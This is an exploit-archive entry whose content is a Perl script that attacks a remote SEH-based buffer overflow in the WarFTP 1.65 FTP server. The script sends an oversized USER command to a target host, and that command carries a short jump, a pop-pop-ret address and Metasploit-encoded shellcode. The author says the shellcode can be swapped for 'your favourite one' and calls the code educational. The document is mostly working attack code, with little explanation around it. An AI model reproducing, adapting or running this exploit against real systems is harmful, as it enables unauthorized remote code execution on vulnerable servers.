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WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit

🗓️ 15 Mar 2007 00:00:00Reported by RootType 
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WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit By Umesh Wanve. Tested on Windows 2000 SP4 Server English and Windows 2000 SP4 Professional English. Overwrites SEH handler with NOP Sled and Hellcode

Code

                                                # ===============================================================================================
#                   WarFTP 1.65 (USER) Remote Buffer Overflow SEH overflow Exploit
#                               By Umesh Wanve
# ===============================================================================================
# 
# Date : 15-03-2007
#
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
# 
# Well I used different technique here. Rather than overwriting EIP, I used SEH handler overwrite 
# method. Preety simple. 
#
# Stack --->      buffer                       ===  AAAAA.........
#                   |
#            Pointer to next SEH               ===  Short Jump to Hellcode  
#                   |
#               SEH Handler                    ===  Pop, Pop, Ret (ws2help.dll win2000 sp4)
#                   |
#                NOP Sled                      ===  Nop Sled
#                   | 
#                Hellcode                      ===  Hell.........
# 
#
#
#
# P.S: This was written for educational purpose. Use it at your own risk.Author will be not be 
#      responsible for any damage.
#  
# Always Thanks to Metasploit. 
#
#==================================================================================================
#!/usr/bin/perl

use IO::Socket;
#use strict;

# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com 
my($shellcode)=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42".
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32".
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a".
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c".
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57".
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50".
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d".
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f".
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a".
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76".
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65".
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78".
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f".
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65".
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d".
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31".
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69".
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61".
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70".
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";

my($pointer_to_next_seh)="\xeb\x06\x90\x90";                  # Short Jump

my($seh_handler)="\xa9\x11\x02\x75";                          #pop, pop, ret 
                                                              #(ws2help.dll win2000 sp4) 



if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "21",


Proto    => "TCP"))
{
                
		     $exploit  = "USER ".                          #Vulnerable Command                          
                             ("A"x485).                        #Buffer 
                             "BBBB".                           #EIP Overwrites here :)
                             ("\x90" x 80).                    #Garbage
				     $pointer_to_next_seh.            
                             $seh_handler.
                             ("\x90" x 10).
                             $shellcode. 				   #ur code	
                             ("\x90" x 10).
                             "\r\n";
                 
		     print $socket $exploit;

                 sleep(1);
			
               
                 close($socket);
}
else
{
                 print "Cannot connect to $ARGV[0]:21\n";
}

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